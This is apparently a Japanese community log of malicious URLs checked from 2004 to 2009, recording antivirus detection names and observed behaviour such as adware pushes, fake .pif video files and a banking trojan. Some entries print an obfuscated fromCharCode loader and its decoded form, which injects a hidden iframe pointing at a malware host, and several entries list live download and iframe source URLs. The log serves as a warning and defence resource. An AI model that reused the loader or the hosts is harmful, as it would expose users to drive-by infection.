| [2005/06/20] | ウィルス名:JS_MHTREDIR.J |
| [2005/06/20] | 他の方の鑑定では以下。
ノートンは無反応だが、AntidoteでIEのキャッシュをスキャンするとウィルス名:Exploit.HTML.Mht+Trojan-PSW.Win32.Lineage.eb を検出。 Bit Defenderでも、ウィルス名:Trojan.Exploit.Html.MHT+Trojan.Html.Gamect.A を検出。 そのサイトは、リネージュのアカウントのハッキングを目的としているらしい。 |
| [2007/01/23] | 2007/01/14 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:TROJ_MULDROP.LM として検出するよう対応、とのこと。 実際に 2007/01/14 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:TROJ_MULDROP.LM を検出することを確認。 2007/01/14 から今日まではファイルは置き換えられていないと推測される。 |
| [2007/01/19] | 2007/01/13 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:TROJ_DROPPER.BXE として検出するよう対応、とのこと。 実際に 2007/01/13 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:TROJ_DROPPER.BXE を検出することを確認。 2007/01/13 から今日までのファイルの置き換えは無いと推測される。 |
| [2007/01/23] | 2007/01/14 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:TROJ_MULDROP.LL として検出するよう対応、とのこと。 実際に 2007/01/14 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:TROJ_MULDROP.LL を検出することを確認。 2007/01/14 から今日まではファイルは置き換えられていないと推測される。 |
| [2007/01/23] | 2007/01/14 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:TROJ_MULDROP.KZ として検出するよう対応、とのこと。 実際に 2007/01/14 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:TROJ_MULDROP.KZ を検出することを確認。 2007/01/14 から今日まではファイルは置き換えられていないと推測される。 |
| [2007/01/14] | ウィルス名:WORM_RBOT.GEN |
| [2007/01/14] | ウィルス名:WORM_SPYBOT.AMK |
| [2007/05/10] | ウィルス名:JS_SMALL.GIO |
| [2007/01/15] | 2007/01/04 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:TROJ_DELF.CZM として検出するよう対応、とのこと。 実際に 2007/01/04 にDLしたファイルからウィルス名:TROJ_DELF.CZM を検出することを確認。 しかし、今日改めて当該URLからDLしてみるとバスター無反応。 2007/01/04 から今日までの間にファイルの置き換えがあったと思われる。 |
| [2007/01/15] | 2007/01/04 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:TROJ_DELF.CZP として検出するよう対応、とのこと。 実際に 2007/01/04 にDLしたファイルからウィルス名:TROJ_DELF.CZP を検出することを確認。 しかし、今日改めて当該URLからDLしてみるとバスター無反応。 2007/01/04 から今日までの間にファイルの置き換えがあったと思われる。 |
| [2007/01/15] | 2007/01/04 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:TROJ_DLOADER.GRC として検出するよう対応、とのこと。 実際に 2007/01/04 にDLしたファイルからウィルス名:TROJ_DLOADER.GRC を検出することを確認。 しかし、今日改めて当該URLからDLしてみるとバスター無反応。 2007/01/04 から今日までの間にファイルの置き換えがあったと思われる。 |
| [2007/01/15] | 2007/01/04 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:TSPY_LINEAGE.DOD として検出するよう対応、とのこと。 実際に 2007/01/04 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:TSPY_LINEAGE.DOD を検出することを確認。 2007/01/04 から今日まではファイルは置き換えられていないと推測される。 |
| [2007/01/04] | ウィルス名:TSPY_LINEAGE.DZC |
| [2005/03/22] | ウィルス名:ADW_RBLAST.E+JAVA_BYTEVER.A 。これを閉じると //coolteenpussy.com/ を表示。 |
| [2008/10/06] | ウィルス名:TROJ_FAKEAV.FP |
| [2009/04/28] | ウィルス名:TROJ_USBINE.G |
| [2007/05/13] | ウィルス名:TROJ_GENERIC |
| [2004/10/24] | ウィルス名:HTML_REDIR.A+JAVA_BYTEVER.A-1 |
| [2008/10/06] | DL+解凍すると「ISTactivex.dll」なるファイルが現れるが、ウィルス名:TROJ_ISTBAR.BU を検出。 |
| [2005/09/26] | DL+解凍すると「istactivex.dll」というファイルが現れる。
このファイルにはバスター無反応だが、以下のアンチウィルスソフトで反応。 AntiVir → Trojan/Dldr.IstBar.AS ArcaVir → Trojan.Downloader.Istbar.Gen.54718.MX AVG Antivirus → Downloader.Istbar.EK Dr.Web → Trojan.Isbar.353 F-Prot Antivirus → W32/Istbar.VE@dl Kaspersky Anti-Virus → Trojan-Downloader.Win32.IstBar.gen VBA32 → Trojan-Downloader.Win32.IstBar.1 |
| [2006/08/05] | 2006/07/21 にトレンドマイクロ社にDL+解凍して現れた「ISTactivex.dll」ファイルを提出。
2006/07/26 に返事があり、現在のパターンファイル以降にて、ウィルス名:ADW_ISTBAR.OZ として検出するよう対応する予定とのこと。 しかし、今日、改めて確認すると、バスター無反応。恐らく、新しいファイルに随時置き換えられるURLと推測される。 |
| [2008/10/06] | DL+解凍すると「ysbactivex.dll」なるファイルが現れるが、ウィルス名:TROJ_ISTBAR.BU を検出。 |
| [2004/04/22] | 怖い女の顔を表示したウィンドウが斜めに動き回る。Alt+F4で脱出。 |
| [2005/10/23] | 再確認。404になっている。 |
| [2007/05/13] | ウィルス名:TSPY_BANCOS.DBS |
| [2007/05/13] | ウィルス名:TSPY_BANCOS.DCR |
| [2007/05/13] | ウィルス名:TSPY_BANCOS.DCU |
| [2007/05/13] | ウィルス名:TSPY_BANCOS.DDC |
| [2008/07/19] | 真っ白なページだが、ウィルス名:TSC_GENCLEAN+JS_DLOADER.WTC を検出。
IFRAMEタグで以下のURLを呼び出しているのが原因。 //www.panslog.net/wiki/index1.htm |
| [2008/10/08] | ウィルス名:TROJ_UPACK.CC |
| [2008/10/16] | 真っ白なページ。バスター無反応だが、他社製ウィルス駆除ソフトでは反応があると思われる。 |
| [2008/07/19] | ウィルス名:TSC_GENCLEAN+TROJ_AGENT.ATYZ |
| [2009/03/21] | こんな感じ のページだが、ウィルス名:JS_AGENT.ANLE を検出。 |
| [2009/03/21] | こんな感じ のページだが、ウィルス名:TROJ_AGENT.ANLF を検出。 |
| [2009/03/21] | こんな感じ のページだが、ウィルス名:JS_AGENT.ANLG を検出。 |
| [2009/03/21] | こんな感じ のページだが、ウィルス名:TROJ_GENERIC.DIT を検出。 |
| [2008/12/31] | 2重拡張子。ウィルス名:TROJ_AGENT.AHEF |
| [2005/07/30] | ウィルス名:JAVA_BYTEVER.A-1 。踏むと こんな感じ のサイト。
このウィルス発動は隠しスクリプトで呼び出される。そのスクリプト読み込みは下のURLより。 //in.selltraffic.biz/in.js?id=1002 ↑ この隠しスクリプトのソースは以下。暗号化されている部分がある。 ↓ try{ eval(String.fromCharCode (100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,60, 105,102,114,97,109,101,32,115,116,121,108,101,61,39,100,105,115, 112,108,97,121,58,110,111,110,101,39,32,115,114,99,61,39,104,116, 116,112,58,47,47,56,50,46,49,55,57,46,49,54,54,46,54,57,47,50,48, 54,52,55,47,39,62,60,47,105,102,114,97,109,101,62,34,41)) }catch(e){} ↑ 上のソースを読めるようにすると下のようになる。 ↓ try{ eval(String.fromCharCode (document.write("<iframe style='display:none' src='http://82.179.166.69/20647/'></iframe>") }catch(e){} ↑ この//82.179.166.69/20647/がウィルスの発動源。 |
| [2006/01/14] | 他の方の結果では、
「海外アダルトサイトに行きます。読み込みが何故か遅いです。リンク先クリックしてみるとウイルス反応あり。 Trojan-Downloader.Win32.Agent.acd 検出。wmfの脆弱性を狙ったウイルスのようです。」 |
| [2005/11/25] | //www.thexxxarchive.com/ に飛ぶので、そちらのURL解説を参照。
他の方の結果では「アンチドート反応あり。Exploit.HTML.Iframe.FileDownload 検出。」 |
| [2005/02/01] | 海外サムネイルアダルトサイトだがウィルス名:EXPL_IFRAMEBO.A を検出。 |
| [2005/08/20] | 海外アダルトサイト。ウィルス名:HTML_REDIR.AI+JAVA_BYTEVER.A |
| [2006/01/12] | 改めて確認。ウィルス名:EXPL_WMF.GEN+TROJ_NASCENE.Y 。「as.wmf」をDLしろ、と言ってくる。
ソースを見ると、Location ヘッダで、以下の @ に飛び、更に A に飛ぶ。 @、//1800-search.com/closed.php A、//1800-search.com/as.wmf |
| [2005/01/04] | ウィルス名:JS_DIALOGARG.A 。ページに問題があるらしく、そのうちにurl:res://shdoclc.dll/HTTP_501.htmに変わる。 |
| [2005/08/26] | ウィルス名:HTML_REDIR.AI+JAVA_BYTEVER.A |
| [2005/11/01] | 海外アダルトサイト。ウィルス名:HTML_REDIR.AI |
| [2006/10/18] | 海外サイトだが、ウィルス名:JS_EXCEPTION.GEN を検出。
ソースを見ると、IFRAMEタグで複数のURLを呼び出しているが、その中の以下のURLがウィルスの発動元である。 //67.15.114.122/my_stat.php |
| [2008/12/31] | 2重拡張子。ウィルス名:TROJ_AGENT.AULZ |
| [2006/10/18] | 海外サイトだが、ウィルス名:JS_EXCEPTION.GEN を検出。
ソースを見ると、IFRAMEタグで複数のURLを呼び出しているが、その中の以下のURLがウィルスの発動元である。 //67.15.114.122/my_stat.php |
| [2008/12/31] | こんな感じ のサイトだが、ウィルス名:JS_AGENT.ADOW を検出。 |
| [2008/10/10] | ウィルス名:TROJ_NUWAR.GFZ |
| [2008/10/10] | こんな感じ のページだが、ウィルス名:HTML_AGENT.AVYZ を検出。 |
| [2008/11/23] | ウィルス名:ADW_ANTIVIR |
| [2008/10/10] | 2重拡張子。ウィルス名:TROJ_DLOAD.DU |
| [2004/09/20] | ウィルス名:WORM_NETSKY.B+WORM_NETSKY.DAM |
| [2007/02/20] | 2007/02/12 にトレンドマイクロ社に中身の「axo.dll」ファイルを提出。
今日、その結果の連絡があり、ウィルス名:TROJ_DLOADER.ITL として検出するよう対応、とのこと。 実際に 2007/02/12 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:TROJ_DLOADER.ITL を検出することを確認。 2007/02/12 から今日までのファイルの置き換えは無いと推測される。 |
| [2007/02/19] | ウィルス名:TROJ_BANLOAD.ALH |
| [2004/09/05] | ウィルス名:BKDR_WINCRASH.A |
| [2008/10/10] | ウィルス名:HKTL_LDPINCH.BDB |
| [2008/10/10] | 真っ白なページだが、ウィルス名:VBS_SMALL.DEK を検出。繰り返し、リロードしている。 |
| [2008/10/10] | ウィルス名:PAK_GENERIC.003+TROJ_SHEUR.DK |
| [2008/10/10] | ウィルス名:EXPL_ANICMOO.GEN |
| [2008/10/10] | 真っ白なページだが、ウィルス名:EXPL_ANICMOO.GEN を検出。 |
| [2008/10/10] | 真っ白なページだが、ウィルス名:EXPL_ANICMOO.GEN を検出。
| [2008/10/10] | 真っ白なページだが、ウィルス名:VBS_AGENT.JYB を検出。 |
| [2008/10/10] | ウィルス名:CRYP_MANGLED+MAL_INFOSTL |
| [2007/05/13] | ウィルス名:TROJ_AGENT.AAP |
| [2007/05/13] | ウィルス名:PSPY_PROXY |
| [2007/05/13] | ウィルス名:WORM_GENERIC |
| [2007/05/13] | ウィルス名:WORM_WOOTBOT.GEN |
| [2007/05/13] | ウィルス名:WORM_WOOTBOT.CP |
| [2005/10/25] | ブラクラ:「 You are an idiot ! 」 |
| [2005/10/29] | 「 You are an idiot ! 」の音声とともにウィンドウが飛び回る。Alt+F4で脱出。 |
| [2009/05/05] | こんな感じ のサイト。バスター無反応だが、他社製ウィルス駆除ソフトによっては反応があるらしい。 |
| [2007/04/16] | 海外アダルトサイトだが、バスター2007が危険なWebサイトとして警告する。 |
| [2005/03/26] | ウィルス名:TROJ_VB.GC |
| [2008/10/11] | ウィルス名:PAK_GENERIC.001 |
| [2005/07/31] | ウィルス名:JS_MHTREDIR.AG+JAVA_BYTEVER.A |
| [2005/11/08] | 踏むと こんな感じ のサイト。このページ表示までは無害。普通に閉じれる。
このページではディスクトップ画面のデザインを変えることが出来るらしいファイルをいくつかDLできる。 しかし、全てのファイルからスパイウェアの一種:アドウェアを検出。以下が結果である。 BitDefender → Trojan.Downloader.Small.BKE, Application.Adware.NewDotNet.B.Dropper ClamAV → Adware.NewDotNet.B-4 Dr.Web → Trojan.DownLoader.3945, Adware.NewDotNet Fortinet → W32/Small.BKE-dldr Kaspersky Anti-Virus → Trojan-Downloader.Win32.Small.bke, not-a-virus:AdWare.Win32.NewDotNet VBA32 → AdWare.Win32.NewDotNet |
| [2005/04/17] | ウィルス名:SPYW_HOLISTYC.A |
| [2006/05/27] | 再確認。ページが無くなっている。 |
| [2005/04/17] | ウィルス名:TROJ_HOLICA.C |
| [2006/05/27] | 再確認。ページが無くなっている。 |
| [2005/04/17] | ウィルス名:TROJ_DYFICA.AW |
| [2006/05/27] | 再確認。ページが無くなっている。 |
| [2005/08/26] | 踏むとブラクラ並に色々なアダルトサイトが開く。その中にウィルス憑きサイトが含まれていると思われる。
私が何回か確認した時はバスター無反応だったが、踏むタイミングにより、ウィルスを検出するらしい。 |
| [2009/05/18] | こんな感じ のサイト。バスター無反応。
しかし、GENOウイルス感染サイトらしい。Vista環境では一応は無害らしいが、XP環境では要注意。 |
| [2006/04/01] | 以下の他の方のレスを参照。真偽は不明。
「「METELE AL ORDENATA」というサイトに飛ぶと同時になにやらダウンロードされます。STARTをクリックすると「せっかく作成して保存しようとした文書がエラーで保存できない」的な設定で画面内のPCをぶっ壊そう(画面内PCをクリックすることによって殴ることができる)というGAMEができます。GAMEは何回でもできる。何回かやると状況がかわる様ですが私がやったのは2回まで。つまり2GAMEまでPC無害ですが、それ以降は不明。すくなくとも最初になにやらダウンロードされる件に関してはPC無害のようです。」 |
| [2006/04/01] | 「上記について訂正いたします。
PC有害です。アクセスすると後で韓国のサーバ経由でNetbus/GabanBusという不正な攻撃を受けます。絶対にアクセスしないでください。お詫びして訂正いたします。」 |
| [2005/11/20] | ウィルス名:TROJ_AGENT.AAO |
| [2005/11/20] | 海外アダルトページ。このページ表示は無害で普通に閉じれる。
動画ファイルが4つ並んでいてDL出来るようになっているが、実際はpifファイルである。 ファイルの種類は 「テキストベース(コマンドライン)の機能を実行できます。」とのこと。 DLしてみると4つともファイルサイズ:296KB で、DLした途端、バスターがウィルス名:TROJ_AGENT.AAOを検出。 以下の4つが動画ファイルのURLになっている。 //www.thetaboomovies.com/free/mytaboomovie01_mpeg.pif //www.thetaboomovies.com/free/mytaboomovie02_mpeg.pif //www.thetaboomovies.com/free/mytaboomovie03_mpeg.pif //www.thetaboomovies.com/free/mytaboomovie04_mpeg.pif |
| [2005/11/25] | 踏むと こんな感じ のサイト。
ダイアログを表示し、何かをインストールするよう催促してくる。拒否すると これ を表示する。「OK」を押すと再びダイアログを表示。再度拒否するとそれ以降は何も無かった。 このサイトはIFRAMEタグで//66.117.37.5/connect.cgi?id=155を呼び出している。 |
| [2007/01/18] | 直踏みでは以下のURLからファイルが落ちてくるので、そちらのURL List解説を参照。
//www.thomas.org.br/new_ctj/busca_ctj/busca_lateral2.php/Formulario_TSE.scr |
| [2007/01/18] | ファイルサイズ:1.48MB 。2007/01/14 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:TSPY_BANKER.FZB として検出するよう対応、とのこと。 実際に 2007/01/14 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:TSPY_BANKER.FZB を検出することを確認。 2007/01/14 から今日まではファイルは置き換えられていないと推測される。 |
| [2008/12/30] | 再確認。ウィルス名:TSPY_BANKER.FZB を検出。未だファイルは置き換えられていないと思われる。 |
| [2005/05/02] | ウィルス名:TSPY_LINEAGE.GEN |
| [2005/09/12] | ウィルス名:HTML_REDIR.AI+JAVA_BYTEVER.A |
| [2009/05/18] | こんな感じ のサイト。バスター無反応。
しかし、GENOウイルス感染サイトらしい。Vista環境では一応は無害らしいが、XP環境では要注意。 |
| [2008/10/11] | 2重拡張子。ウィルス名:TROJ_AGENT.AJPY |
| [2005/05/22] | 踏むと海外アダルトサイト。ウィルス名:JAVA_BYTEVER.A。こんな窓 を何度拒否しても表示。 |
| [2008/11/09] | こんな感じ のサイト。このページ表示までバスター無反応。以下の他の方の結果を参照のこと。
「toggle.comというタイトルの外国のファイルを紹介しているサイトへ行きました。 当環境ではそこまで Kaspersky 無反応ですが、マカフィーアドバイザーで「New Malware.hi trojan」などが検出されるファイルがあるサイトとして有害判定を受けています。」 |
| [2007/04/02] | 海外アダルトサイト。バスター2007が危険なwebサイトとして警告する。 |
| [2005/03/10] | ウィルス名:JAVA_BYTEVER.A |
| [2006/01/17] | バスター無反応だが、Kaspersky で not-a-virus:AdWare.Win32.TopSearch.a を検出。 |
| [2006/01/17] | スパイウェアの一種:アドウェア配布サイトと思われる。こんな感じ のサイト。 画面にあるチェックボックスにチェックを入れ、「Yes,I Accept」をクリックすると、ウィンドウ表示が こんな感じ に変わり、「SearchAssistant.exe」をDLしろ、と言ってくる。このexeからアドウェアを検出。 |
| [2006/08/05] | 2006/07/24 にトレンドマイクロ社にDL+解凍して現れた「topmoxie.exe」ファイルを提出。
トレンドマイクロ社から連絡は無かったが、対応してくれた模様。 今日、当該URLからDLしみると、ウィルス名:ADW_TREBATES.B として検出。 |
| [2006/08/05] | 2006/07/24 にトレンドマイクロ社にDL+解凍して現れた「mptopmoxie.exe」ファイルを提出。
トレンドマイクロ社から連絡は無かったが、対応してくれた模様。 今日、当該URLからDLしみると、ウィルス名:ADW_WEBSAVING.A として検出。 |
| [2006/08/11] | 2006/08/05 にトレンドマイクロ社にDL+解凍して現れた「MyPointsPointAlert_InstallSilent.exe」ファイルを提出。
今日、その結果の連絡があり、ウィルス名:ADW_TOPREBATES.B として検出するよう対応したとのこと。 2006/08/05 にDLしたファイルからウィルス名:ADW_TOPREBATES.B を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:ADW_TOPREBATES.B を検出することを確認。 |
| [2006/07/18] | ウィルス名:ADW_WEBREBATES.C |
| [2006/08/05] | 2006/07/24 にトレンドマイクロ社にDL+解凍して現れた「UpromiseRemindU_InstallSilent.exe」ファイルを提出。
トレンドマイクロ社から連絡は無かったが、対応してくれた模様。 今日、当該URLからDLしみると、ウィルス名:ADW_TREBATES.M として検出。 |
| [2006/08/05] | 2006/07/24 にトレンドマイクロ社にDL+解凍して現れた「uutopmoxie.exe」ファイルを提出。
トレンドマイクロ社から連絡は無かったが、対応してくれた模様。 今日、当該URLからDLしみると、ウィルス名:ADW_WEBSAVING.A として検出。 |
| [2006/01/25] | スパイウェアサイト。踏むと こんな感じ のサイトだが、このページ表示の時点で、ウィルス名:ADW_EZULA.A を検出。以下のファイルをインストールしようとしている。
//a94.g.akamai.net/7/94/1622/2/www.ezula.com/TopText/ezStub.cab |
| [2006/01/25] | //www.toptext.net/autoload.aspに飛ぶので、そちらのURL List解説を参照。 |
| [2007/03/07] | 2006/10/09 にトレンドマイクロ社にファイルを提出。
2006/10/16 にその結果の連絡があり、ウィルス名:TROJ_Generic として検出するよう対応、とのこと。 実際に 2006/10/09 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:TROJ_Generic を検出することを確認。 2006/10/09 から今日まではファイルは置き換えられていないと推測される。 |
| [2008/08/29] | ウィルス名:TSC_GENCLEAN+TROJ_FAKEAV.FW |
| [2008/10/11] | ウィルス名:MAL_NSANTI |
| [2008/12/30] | 真っ白なページだが、ウィルス名:POSSIBLE_SCRDL を検出。右クリックも不可のようである。
このサイトは、'Microsoft Corporation'からの'Remote Data Services Data Control'アドオンを実行しようとしている。 |
| [2008/10/11] | ウィルス名:TROJ_EMBEDDED.JD |
| [2005/07/12] | IFRAMEタグで以下のURLを呼び出している。
//82.179.166.2/7dafac97/test2/iejp.htm |
| [2005/06/09] | ウィルス名:JAVA_BYTEVER.A。//www.loadcash.biz/socn/1.htm に飛ぶ。
このセキュリティ警告 を表示し、拒否すると これ を表示。 |
| [2005/08/07] | 踏むと以下のURLに飛んで、HDDが唸り出し、そのうち //82.179.166.2/free_default.php に飛ぶ。
下記で下線部分はアクセスするたびに変わる模様。 //82.179.166.2/delay/sec.php?id=37217&c=6Yx1b1NK2eh349fu1MP38e8YxJLqd3N4 この//www.tracktraff.cc/cnt/processor?nexusは以下のURLと関連している。その中で 3. と 4. の下線部分は常に変わる模様。
|
| [2005/02/24] | ソースが暗号化されたページで踏むと下のどちらかが検出される。
1、ウィルス名:HTML_REDIR.A 2、ウィルス名:JAVA_BYTEVER.A+JAVA_BYTEVER.K+JAVA_BYTEVER.A-1 真っ白なページだが左上のほうにドットサイズの小さな黒い「点」が5個並んでいる。 恐らく、5個の不明な何かを呼び出している「点」だと思われる。 |
| [2005/10/23] | お寄せいただいた情報では、
「//landing.domainsponsor.com/index.mas?epl=UVsPWVALXVUMVV8OClIWXBZRFBkAWlpHAGpcXAUNAlIに飛びます。検索ができるサイトでポップアップあり。」 |
| [2005/02/24] | エラーがある真っ白なページだがソースを見ると大部分が暗号化された怪しいページ。右クリック不可。 |
| [2005/03/29] | 踏むと真っ白なページだが、左上のほうにドットサイズの黒い「点」が5個並んでいる。
ソースでは暗号化されているため、何を呼び出しているのか分からないが、ウィルス名:HTML_REDIR.A か、ウィルス名:JAVA_BYTEVER.K+JAVA_BYTEVER.A-1+JAVA_BYTEVER.Aを検出する。 |
| [2005/04/09] | ウイルス名:JAVA_BYTEVER.K+HTML_REDIR.A+JAVA_BYTEVER.A+JAVA_BYTEVER.A-1 |
| [2005/10/23] | お寄せいただいた情報では、
「//landing.domainsponsor.com/index.mas?epl=UVsPWVALXVUMVV8OClIWXBZRFBkAWlpHAGpcXAUNAlIに飛びます。検索ができるサイトでポップアップあり。」 |
| [2005/03/10] | ソースが暗号化されていて、踏むとウィルス名:JAVA_BYTEVER.K+JAVA_BYTEVER.A-1+JAVA_BYTEVER.Aを検出。 |
| [2005/03/23] | ウィルス名:ADW_INEBBAR.A |
| [2005/11/05] | 海外アダルトサイトを表示するが、同時にタスクバーのみに存在する下のタイトルの窓が現れる。
「Systray???????????????????????????????????????????」 この窓は最大化不可でURLは不明、閉じてもすぐに復活する。強制終了でも消えない窓であった。 この窓がタスクバーにあると、定期的+ランダム的に色々なアダルトサイトを呼んできて表示する。 そのランダムで呼ばれたサイトがブラクラ並に開くサイトだったり、ウィルス憑きサイトであったり、ウィルス+ブラクラ複合型サイトであったりする。 詳細は //vipinvest.net/index.php のURL解説を参照。 |
| [2005/07/29] | //www.vxiframe.biz/adverts/046/1.phpに飛び、ウィルス名:JAVA_BYTEVER.Aを検出。 |
| [2006/01/12] | 踏んでみると、海外アダルトサイトで、これ を表示。同時に別窓でツールバーやアドレスバーが無い別のサイトも表示する。
これ で、「OK」を選ぶと別窓を何枚か表示、「キャンセル」を選ぶともう一度 これ を表示、さらに「キャンセル」を選ぶと、別窓を何枚か表示した。
上記これらの挙動のほかに2種類のexeファイルをDLしろ、としきりに催促してくる。その2種類のexeファイルは以下の2つ。 @、//www.quantos.info/toolbar/sheila-charvalho-flagra-transando.exe A、//www.quantos.info/toolbar/viviane-e-o-namorado-fudendo.exe ↑ @、A ともファイルサイズ:282KB 。上下とも同じものと思われる。 上下ともバスター無反応だが、Avast! で Win32:Adware-gen. を検出。 その他、お気に入りに入れろ、としつこく催促してくる別窓や、広告のような別窓なども複数表示する。それらを閉じていくと、これ を表示して、スタートページを変えろ、と言ってくる。 |
| [2006/01/13] | 他の方の結果は以下の「」内。
「洋エロサイトなどが大窓などで何個も開き、何個もファイルをダウンロードしようとしてきます。閉じても閉じても開き、更にお気に入りに登録しようとしてきます。ファイルも更にダウソしてこようとしてきます。プロセス終了で脱出。このファイルをオンラインスキャンで調べると、 Avast Win32:Adware-gen. Ikarus AdWare.Softomate.E TheHacker Adware/ToolBar.ISearch.c 判定。」 |
| [2006/01/14] | 「ゾンビウインドウと逃げウインドウが見つかりました。URLを削ってサイトに行くと、勝手にファイル(多分スパイウェア)のダウンロードが始まり、ウィンドウを閉じようとするとお気に入りに登録されそうになります。」
「アドウェアを執拗に落とさせようとしてくるエロサイトです。」 「かなりしつこく何度も何度もWin32:Adware-genというアドウェアを送ってくる(avast!)。」 |
| [2006/01/15] | 他の方の結果は以下の「」内。
「洋エロサイトなどが大窓などで何個も開き、何個もファイルをダウンロードしようとしてきます。 閉じても閉じても開き、更にお気に入りに登録しようとしてきます。ファイルも更にダウソしてこようとしてきます。 プロセス終了で脱出。このファイルをオンラインスキャンで調べると Avast Win32:Adware-gen. Ikarus AdWare.Softomate.E TheHacker Adware/ToolBar.ISearch.c 判定。」 |
| [2006/02/03] | 「洋エロサイトが大窓で開き、ファイルをダウンロードしてきます。
別窓も何個か開きます。アラートもあり。閉じても閉じても開きます。ダウソされるファイルはKaspersky反応あり。 not-a-virus:AdWare.Win32.Softomate.g 検出。アドウェアのようです。」 |
| [2006/02/22] | 「洋エロサイトが大窓で開き、閉じても閉じても開きます。アラートあり。更に閉じていくと、お気に入りに登録しようとするページも開きます。」 |
| [2006/02/22] | 「非常に鬱陶しい洋エロサイト。ゾンビウインドウ出しまくります。アフィリ業者のページをお気に入りに登録するとか、変なサイトをスタートページに設定するとかで、非常に迷惑です。」 |
| [2006/01/15] | 他の方の結果は以下の「」内。
「大窓で洋エロサイトが開き、ポップも開きます。 アドウェアをダウソさせようとしてくるし、お気に入りにも登録させようとしてきます。 閉じても閉じる窓より更に窓を多く開いてきます。」 |
| [2006/01/20] | 「何度も何度もWin32:Adware-genというアドウェアを送ってくる(avast!)。」 |
| [2006/01/17] | 確認すると、以下のURL List解説の[2006/01/12]時と同じなので、そちらの解説を参照。
//www.transa-na.net/?news/archive/2006/01/12.jpg |
| [2006/01/21] | 他の方の結果では「アドウェア落としてきてお気に入りに登録しようとする洋アダルトサイト。」 |
| [2006/01/22] | 確認すると、以下のURL List解説の[2006/01/12]時と同じなので、そちらの解説を参照。
//www.transa-na.net/?news/archive/2006/01/12.jpg |
| [2006/01/24] | 他の方の結果では、
「解読不能のダイアログ表示後、ゾンビウインドウを乱発する海外アダルトサイト。 quantos.infoなるツールバーのダウンロードを迫ったり、お気に入りサイトに強引に追加しようとします。」 |
| [2006/06/01] | 「transa-na.netという海外のアダルトサイトでした。
アクセスするとポップアップでたくさん他のアダルトサイトが開きます。 さらにexeファイルも送ってきます。 そのexeファイルからWin32:Adware-gen. [Adw]を検出しました。」 |
| [2006/06/01] | 「画像ではありません。HTMです。画像ファイルが消えたのかもしれませんが、404ではなく拡張子JPGのHTMを送りつけるのは悪質です。
HTMの中身は悪質アダルトサイトで、怪しいプログラムを勝手にインストールしようとしたり、勝手にお気に入りに追加したり、悪質です。 当方では防御が強いのでノートンは警告しませんでしたが、もしかしたらウイルスも仕込まれているかもしれません。PC有害と判定します。」 |
| [2006/05/05] | 他の方の結果は以下の「」内。
「洋エロサイトが大窓で開き、何かをダウンロードしようとしてきます。アドウェアかな? 閉じると大窓がいくつか開きます。窓の上の部分がはみ出します。更にアラートなどあり。 更に閉じようとするとお気に入りに登録しようとしてきます。 お気に入り登録窓を閉じるとまた大窓で洋エロサイトが更に開きます。 その時点で強制的に脱出。その時点まではカスペ反応なしでしたが怪しいです。踏まないほうがいいでしょう。」 |
| [2006/11/04] | 他の方の結果では
「McAfee SiteAdvisor − エクスプロイト警告 の反応あり。洋エロサイトが開きまくり、お気に入りへ登録させようとしたりアラートが開いたりします。プロセスから閉じて脱出。」 |
| [2006/01/15] | 他の方の結果は以下の「」内。
「//www.transa-na.net/?news/archive/2006/01/12.jpg と同じ挙動の洋エロサイトでした。 アドウェアを何回もダウソさせようとします。お気に入りに登録させようとするサイトも開きます。 環境によっては、閉じても閉じても開くページが増えていきます。踏まないほうがいいでしょう。」 |
| [2005/12/02] | ウィルス名:HTML_CRINET.A |
| [2005/12/03] | ノートンでは、ウィルス名:HacktoolDoSを検出するらしい。 |
| [2006/01/15] | 他の方の結果は以下の「」内。
「Telnetストームというタイプのブラクラ。PC有害。一部のアンチウイルスソフトでウイルスと誤検出されるがブラクラ。 踏んだ場合はタスクマネージャーでIEを終了させRundll32.exeというプロセスを終了させればOK。 ちなみにFireFoxでは開かなかったがIEでは開いた。」 |
| [2006/02/13] | 「Telnetブラクラ、ノートンが最初に HackTool.Dos を検出、その他セキュリティ反応あり。」
「トロイ(Hacktool.DoS)をNAV2006で検出。」 「Telnetストームというタイプのブラクラ。」 「一部のアンチウイルスソフトでウイルスと誤検出されるがブラクラ。」 |
| [2006/02/22] | 「Kaspersky 反応あり。Trojan.VBS.IFrame 検出。telnetストームのブラクラです。」 |
| [2006/03/04] | 「ブラクラです。コマンドプロンプトを無限に立ち上げつづけ、全てマイクロソフトのサイトに接続に行きます。」 |
| [2006/03/04] | 「ウイルス入りでした。(VBS/DDos-iFrameNet)。踏まぬよう気をつけてください。」 |
| [2006/03/13] | 「ウイルスではなくTelnetストームというブラクラ。名前の通りTelnetが大量に起動します。telnet.exeとRundll32.exeを停止させれば問題なし。」 |
| [2006/03/13] | 「VBS/IFlame.A 検出。有名なブラクラです。」 |
| [2006/03/29] | 「黒い窓がたくさん開いて一時的にPCが重くなります。PC処理能力低下以外の破壊活動は無かったはずです。」 |
| [2006/04/22] | 「VBSで書かれたスクリプト。800*15個のtelnetクライアントがmicorosoftにつながる。」 |
| [2006/05/29] | 「サイトを実際に踏んでみましたが、「Hacktool DOS」というのが発見されました。
このウイルスはシステム管理者を狙ったウイルスなので、それほど、問題ありませんが有害としておきます。 サイトの方ですが、telnetでひたすらMicrosoftにアクセスします。 その後遺症かどうかは知りませんが、IEのスタートページがMicrosoftのページに変わっていました。」 |
| [2006/06/11] | 「Telnetクライアントをたくさん起動させてWindowsのパフォーマンスを低下させるだけのブラクラ。
